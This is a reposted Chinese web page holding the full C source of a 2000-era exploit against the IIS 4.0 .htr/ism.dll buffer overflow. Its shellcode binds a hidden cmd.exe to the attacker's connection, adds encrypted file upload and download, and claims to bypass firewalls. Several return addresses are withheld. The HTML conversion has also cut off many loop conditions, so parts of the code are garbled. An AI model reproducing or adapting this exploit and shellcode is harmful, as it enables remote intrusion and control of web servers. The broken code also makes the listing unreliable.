windows下强大功能的溢出程序源代码

zoukankan html css js c++ java

windows下强大功能的溢出程序源代码

/*----------------------------------------------------------*/ /* IIS4.0的.htr映射ism.dll溢出攻击程序 */ /* 编写：yuange(yuange@nsfocus.com) */ /* 本程序实现所有语言版本WINDOWS下的溢出攻击。 */ /* SHELLCODE代码实现绑定cmd.exe功能，实现上传、 */ /* 下传文件的ftp功能，实现加密传输功能，不开 */ /* 端口、不开服务，可以绕过防火墙等。独创的实 */ /* 现源代码编写shellcode的办法，可以方便编写、 */ /* 修改、调试shellcode，使得编写强大功能的 */ /* shellcode成为可能。也解决了溢出攻击的几个根 */ /* 本问题：1、溢出点确定；2、shellcode定位； */ /* 3、jmp esp功能代码地址确定；4、WINDOWS的API */ /* 调用地址版本相关问题。另一个版本实现了接管 */ /* WWW功能，可以实现不修改WEB页面文件的情况下替 */ /* 换所有WEB页面。 */ /* 一般的溢出攻击程序也可以使用这个框架 */ /* */ /* 程序在vc6.0下编译通过 */ /*----------------------------------------------------------*/ /* iis4。0 overflow program ver 1.0 copy by yuange 2000。05。8 */ #include #include #include #include #define FNENDLONG 0x08 #define NOPCODE 'B' // INC EDX 0x90 #define NOPLONG 0x50 #define BUFFSIZE 0x20000 #define PATHLONG 0x12 // c:\inetpub\wwwroot 物理路径长度。 // 因为WWW处理GET /的时候前面要加物理路径，再传递给ISM.DLL处理，所以溢出点与物理路径有 // 关。可以先用.IDC,.ida,.idq泄露物理路径的办法得到物理路径长度 #define RETEIPADDRESS 0xxxxx-PATHLONG+4+4 #define ADD1 0xxxx-0xxxxx-PATHLONG+4 #define ADD2 0xxxxx-0xxxxx-PATHLONG+4 /* 由于一些原因，这儿数据不提供 2000.10.25　*/ // 两个要处理的参数地址，参见后面ISM.DLL有问题代码的注释 #define SHELLBUFFSIZE 0x800 #define SHELLFNNUMS 12 #define DATAXORCODE 0xAA #define LOCKBIGNUM 19999999 #define LOCKBIGNUM2 13579139 #define WEBPORT 80 void shellcodefnlock(); void shellcodefn(char *ecb); void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len); void iisput(int fd,char *str); void iisget(int fd,char *str); int newrecv(int fd,char *buff,int size,int flag); int newsend(int fd,char *buff,int size,int flag); int xordatabegin; int lockintvar1,lockintvar2; char lockcharvar; int main(int argc, char **argv) { char *server; char *str="LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "CreateFileA""\x0" "GetFileSize""\x0" "GetLastError""\x0" "Sleep""\x0" "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" "XORDATA""\x0" "strend"; char buff1[]="GET /""\xff""default.htr/"; char buff2[]=".HTR HTTP/1.1 \nHOST:"; char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char SRLF[]="\x0d\x0a\x00\x00"; char eipexcept1[] ="\xxx\xxx\xxx\xxx"; // char eipexcept[] ="\xxx\xxx\xxx\xxx"; // ret char eipexcept[]="\xxx\xxx\xxx\xxx"; char eipwinnt[] ="\xxx\xxx\xxx\xxx"; char eipwinnt2[]="\xxx\xxx\xxx\xxx"; char reteax[] ="\xxx\xxx\xxx\xxx"; /* 由于一些原因，这儿数据不提供 2000.10.25　*/ char eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64"; char buff[BUFFSIZE]; char recvbuff[BUFFSIZE]; char shellcodebuff[0x1000]; struct sockaddr_in s_in2,s_in3; struct hostent *he; char *shellcodefnadd,*chkespadd; unsigned int sendpacketlong; int i,j,k; unsigned char temp; int fd; u_short port,port1,shellcodeport; SOCKET d_ip; WSADATA wsaData; int offset=0; int OVERADD=RETEIPADDRESS; int result; fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 ."); fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2."); fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net/ ."); fprintf(stderr,"\n welcome to http://www.nsfocus.com/ ."); fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]); if(argc <2){ fprintf(stderr,"\n please enter the web server:"); gets(recvbuff); for(i=0;i if(recvbuff[i]!=' ') break; } server=recvbuff; if(i fprintf(stderr,"\n please enter the offset(0-3):"); gets(buff); for(i=0;i if(buff[i]!=' ') break; } offset=atoi(buff+i); } result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } if(argc>2){ offset=atoi(argv[2]); } OVERADD+=offset; /* if(offset<0||offset>3){ fprintf(stderr,"\n offset error !offset 0 - 3 ."); gets(buff); exit(1); } */ if(argc <2){ // WSACleanup( ); // exit(1); } else server = argv[1]; for(i=0;i if(server[i]!=' ') break; } if(i for(i=0;i+3 if(server[i]==':'){ if(server[i+1]=='\\'||server[i+1]=='/'){ if(server[i+2]=='\\'||server[i+2]=='/'){ server+=i; server+=3; break; } } } } for(i=1;i<=strlen(server);++i){ if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0; } d_ip = inet_addr(server); if(d_ip==-1){ he = gethostbyname(server); if(!he) { WSACleanup( ); printf("\n Can't get the ip of %s !\n",server); gets(buff); exit(1); } else memcpy(&d_ip, he->h_addr, 4); } if(argc>3) port=atoi(argv[3]); else port=WEBPORT; if(port==0) port=WEBPORT; fd = socket(AF_INET, SOCK_STREAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) { closesocket(fd); WSACleanup( ); fprintf(stderr,"\n connect err."); gets(buff); exit(1); } _asm{ mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=*chkespadd; if(temp==0xe9) { ++chkespadd; i=*(int*)chkespadd; chkespadd+=i; chkespadd+=4; } shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(buff,NOPCODE,BUFFSIZE); if(argc>4){ memcpy(buff,argv[4],strlen(argv[4])); } else memcpy(buff,buff1,strlen(buff1)); memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80); shellcodefnadd=shellcodefn; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x1000;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memcpy(shellcodebuff,shellcodefnadd,k); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for(i=0;i<0x400;++i){ if(memcmp(str+i,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,i); sendpacketlong=k+i; for(k=0;k<=0x200;++k){ if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break; } for(i=0;i temp=shellcodebuff[i]; temp^=DATAXORCODE; if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){ buff[OVERADD+NOPLONG+k]='0'; ++k; temp+=0x40; } buff[OVERADD+NOPLONG+k]=temp; ++k; } // memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong); // k+=sendpacketlong; for(i=-0x30;i<0x30;i+=4){ memcpy(buff+ADD1+offset+i,eipexcept,4); memcpy(buff+ADD2+offset+i,eipexcept,4); } for(i=-0x30;i<0x30;i+=4){ memcpy(buff+OVERADD+i,eipexcept,4); } memcpy(buff+OVERADD+i,eipwinnt2,4); memcpy(buff+OVERADD+i+4,reteax,4); memcpy(buff+OVERADD+i+8,eipwinnt,4); memcpy(buff+OVERADD+i+0x0c,eipwinnt,4); memcpy(buff+OVERADD+i+0x10,eipjmpshell,7); // fprintf(stderr,"\n send:\n %s",buff); fprintf(stderr,"\n offset:%d",offset); /* if(argc>2){ server=argv[2]; if(strcmp(server,"win9x")==0){ memcpy(buff+OVERADD,eipwin9x,4); fprintf(stderr,"\n nuke win9x."); } if(strcmp(server,"winnt")==0){ memcpy(buff+OVERADD,eipwinnt,4); fprintf(stderr,"\n nuke winnt."); } } */ sendpacketlong=k+OVERADD+NOPLONG; strcpy(buff+sendpacketlong,buff2); strcpy(buff+sendpacketlong+strlen(buff2),server); strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n"); // printf("\n send buff:\n%s",buff); // strcpy(buff+OVERADD+NOPLONG,shellcode); sendpacketlong=strlen(buff); /* #ifdef DEBUG _asm{ lea esp,buff add esp,OVERADD ret } #endif */ if(argc>6){ if(strcmp(argv[6],"debug")==0){ _asm{ lea esp,buff add esp,OVERADD ret } } } xordatabegin=0; for(i=0;i<1;++i){ j=sendpacketlong; fprintf(stderr,"\n send packet %d bytes.",j); send(fd,buff,j,0); k=newrecv(fd,recvbuff,0x1000,0); if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) { xordatabegin=1; k=-1; fprintf(stderr,"\n ok!\n"); } if(k>0){ recvbuff[k]=0; fprintf(stderr,"\n recv:\n %s",recvbuff); } } k=1; ioctlsocket(fd, FIONBIO, &k); // fprintf(stderr,"\n now begin: \n"); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; k=1; while(k!=0){ if(k<0){ i=0; while(i==0){ gets(buff); if(memcmp(buff,"iisput",6)==0){ iisput(fd,buff+6); } else{ if(memcmp(buff,"iisget",6)==0){ iisget(fd,buff+6); } else i=1; } } k=strlen(buff); memcpy(buff+k,SRLF,3); newsend(fd,buff,k+2,0); } k=newrecv(fd,buff,0x1000,0); if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){ xordatabegin=1; k=-1; } if(k>0){ buff[k]=0; fprintf(stderr,"%s",buff); } // if(k==0) break; } closesocket(fd); WSACleanup( ); fprintf(stderr,"\n the server close connect."); gets(buff); return(0); } void shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop _emit('?') xor ecx,ecx add si,474h cmp dword ptr [esi],ecx jnz getesi add si,4 getesi: mov esi,[esi] add si,8 xor ecx,ecx mov byte ptr [esi],cl jmp next getediadd: pop EDI push EDI pop ESI push ebx // ecb push ebx // call shellcodefn ret address xor ecx,ecx looplock: lodsb cmp al,cl jz shell cmp al,0x30 jz clean0 sto: xor al,DATAXORCODE stosb jmp looplock clean0: lodsb sub al,0x40 jmp sto next: call getediadd shell: NOP NOP NOP NOP NOP NOP NOP NOP } } void shellcodefn(char *ecb) { char Buff[SHELLBUFFSIZE+2]; int *except[3]; FARPROC Sleepadd; FARPROC GetLastErroradd; FARPROC GetFileSizeadd; FARPROC CreateFileAadd; FARPROC WriteFileadd; FARPROC ReadFileadd; FARPROC PeekNamedPipeadd; FARPROC CloseHandleadd; FARPROC CreateProcessadd; FARPROC CreatePipeadd; FARPROC procloadlib; FARPROC apifnadd[1]; FARPROC procgetadd=0; FARPROC writeclient= *(int *)(ecb+0x84); FARPROC readclient = *(int *)(ecb+0x88); HCONN ConnID = *(int *)(ecb+8) ; char *stradd; int imgbase,fnbase,i,k,l; HANDLE libhandle,fpt; //libwsock32; STARTUPINFO siinfo; PROCESS_INformATION ProcessInformation; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; int lBytesRead; int lockintvar1,lockintvar2; char lockcharvar; SECURITY_ATTRIBUTES sa; _asm { jmp nextcall getstradd: pop stradd lea EDI,except mov eax,dword ptr FS:[0] mov dword ptr [edi+0x08],eax mov dword ptr FS:[0],EDI } except[0]=0xffffffff; except[1]=stradd-0x07; imgbase=0x77e00000; _asm{ call getexceptretadd } for(;imgbase<0xbffa0000,procgetadd==0;){ imgbase+=0x10000; if(imgbase==0x78000000) imgbase=0xbff00000; if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){ fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase; k=*(int *)(fnbase+0xc)+imgbase; if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ libhandle=imgbase; k=imgbase+*(int *)(fnbase+0x20); for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){ k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24)); k+=*(int *)(fnbase+0x10)-1; k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c)); procgetadd=k+imgbase; break; } } } } } // 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址 // 注意这儿处理了搜索页面不在情况。 _asm{ lea edi,except mov eax,dword ptr [edi+0x08] mov dword ptr fs:[0],eax } if(procgetadd==0) goto die ; for(k=1;k apifnadd[k]=procgetadd(libhandle,stradd); for(;;++stradd){ if(*(stradd)==0&&*(stradd+1)!=0) break; } ++stradd; } sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); // ZeroMemory(&siinfo,sizeof(siinfo)); _asm{ lea EDI,siinfo xor eax,eax mov ecx,0x11 repnz stosd } siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; siinfo.hStdOutput=hWritePipe1; siinfo.hStdError =hWritePipe1; // k=0; // while(k==0){ k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation); stradd+=8; // } PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); k=8; writeclient(ConnID,stradd+9,&k,0); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; while(1){ PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); if(lBytesRead>0){ ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(lBytesRead>0){ for(k=0;k lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[k]^=lockcharvar; } writeclient(ConnID,Buff,&lBytesRead,0); } } else{ lBytesRead=SHELLBUFFSIZE; l=0; while(l==0){ k=readclient(ConnID,Buff,&lBytesRead); for(l=0;l lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[l]^=lockcharvar; } if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' '){ l=*(int *)(Buff+4); // WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0) ; k=GetLastErroradd(); i=0; while(l>0){ k=readclient(ConnID,Buff,&lBytesRead); if(k==1){ if(lBytesRead>0){ for(k=0;k lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[k]^=lockcharvar; } l-=lBytesRead; WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); } } else{ Sleepadd(0100); ++i; } if(i>10000) l=0; } CloseHandleadd(fpt); l=0; } else{ if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){ fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); Sleepadd(100); l=GetFileSizeadd(fpt,&k); *(int *)Buff='ezis'; //size *(int *)(Buff+4)=l; lBytesRead=8; for(i=0;i lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; } writeclient(ConnID,Buff,&lBytesRead,0); // Sleepadd(100); i=0; while(l>0){ k=SHELLBUFFSIZE; ReadFileadd(fpt,Buff,k,&k,0); if(k>0){ for(i=0;i lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; } i=0; l-=k; writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC); // Sleepadd(100); } else ++i; if(i>100) l=0; } CloseHandleadd(fpt); l=0; } else l=1; } } if(k!=1){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe while(1){ Sleepadd(0x7fffffff); //僵死 } } else{ WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); // Sleepadd(1000); } } } die: goto die ; _asm{ getexceptretadd: pop eax push eax mov edi,dword ptr [stradd] mov dword ptr [edi-0x0e],eax ret errprogram: mov eax,dword ptr [esp+0x0c] add eax,0xb8 mov dword ptr [eax],0x11223344 //stradd-0xe xor eax,eax //2 ret //1 execptprogram: jmp errprogram //2 bytes stradd-7 nextcall: call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len) { int i,k; unsigned char temp; char *calladd; for(i=0;i temp=shellbuff[i]; if(temp==0xe8){ k=*(int *)(shellbuff+i+1); calladd=fnadd; calladd+=k; calladd+=i; calladd+=5; if(calladd==chkesp){ shellbuff[i]=0x90; shellbuff[i+1]=0x43; // inc ebx shellbuff[i+2]=0x4b; // dec ebx shellbuff[i+3]=0x43; shellbuff[i+4]=0x4b; } } } } void iisput(int fd,char *str){ char *filename; char *filename2; FILE *fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); for(i=0;i if(*str!=' '){ filename=str; break; } } for(;i if(*str==' ') { *str=0; break; } } ++i; ++str; for(;i if(*str!=' '){ filename2=str; break; } } for(;i if(*str==' ') { *str=0; break; } } if(filename=="\x0") { printf("\n iisput filename [path\\fiename]\n"); return; } if(filename2=="\x0") filename2=filename; printf("\n begin put file:%s",filename); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); filesize=GetFileSize(fpt,&filesizehigh); strcpy(buff,"put "); *(int *)(buff+4)=filesize; filesize=*(int *)(buff+4); strcpy(buff+0x8,filename2); newsend(fd,buff,i+0x9,0); printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize); Sleep(1000); while(filesize>0){ size=0x800; ReadFile(fpt,buff,size,&size,NULL); if(size>0){ newsend(fd,buff,size,0); // Sleep(0100); filesize-=size; } } CloseHandle(fpt); j=1; ioctlsocket(fd, FIONBIO, &j); printf("\n put file ok!\n"); Sleep(1000); } void iisget(int fd,char *str){ char *filename; char *filename2; FILE *fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); for(i=0;i if(*str!=' '){ filename=str; break; } } for(;i if(*str==' ') { *str=0; break; } } ++i; ++str; for(;i if(*str!=' '){ filename2=str; break; } } for(;i if(*str==' ') { *str=0; break; } } if(filename=="\x0") { printf("\n iisget filename [path\\fiename]\n"); return; } if(filename2=="\x0") filename2=filename; printf("\n begin get file:%s",filename); fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); strcpy(buff,"get "); strcpy(buff+0x4,filename2); newsend(fd,buff,i+0x5,0); printf("\n get file:%s from file:%s",filename,filename2); j=0; ioctlsocket(fd, FIONBIO, &j); i=0; filesize=0; j=0; while(j<100){ // Sleep(100); i=newrecv(fd,buff,0x800,0); if(i>0){ buff[i]=0; if(memcmp(buff,"size",4)==0){ filesize=*(int *)(buff+4); j=100; } else { j=0; printf("\n recv %s",buff); } } else ++j; // if(j>1000) i=0; } printf("\n file %d bytes %d\n",filesize,i); if(i>8){ i-=8; WriteFile(fpt,buff+8,i,&i,NULL); filesize-=i; } while(filesize>0){ size=newrecv(fd,buff,0x800,0); if(size>0){ WriteFile(fpt,buff,size,&size,NULL); filesize-=size; } else { if(size==0) { printf("\n ftp close \n "); } else { printf("\n Sleep(100)"); Sleep(100); } } } CloseHandle(fpt); printf("\n get file ok!\n"); j=1; ioctlsocket(fd, FIONBIO, &j); } int newrecv(int fd,char *buff,int size,int flag) { int i,k; k=recv(fd,buff,size,flag); if(xordatabegin==1){ for(i=0;i lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; } } return(k); } int newsend(int fd,char *buff,int size,int flag) { int i; for(i=0;i lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; buff[i]^=lockcharvar; } return(send(fd,buff,size,flag)); }

查看全文

相关阅读:
门禁控制系统的状态机-《实时控制软件设计》第二周作业
 [leetcode] Single Number
[leetcode] Candy
[leetcode] Gas Station
[leetcode] Clone Graph
[leetcode] Palindrome Partitioning II
[leetcode] Palindrome Partitioning
[leetcode] Surrounded Regions
[leetcode] Sum Root to Leaf Numbers
[leetcode] Longest Consecutive Sequence

原文地址：https://www.cnblogs.com/adodo1/p/4327800.html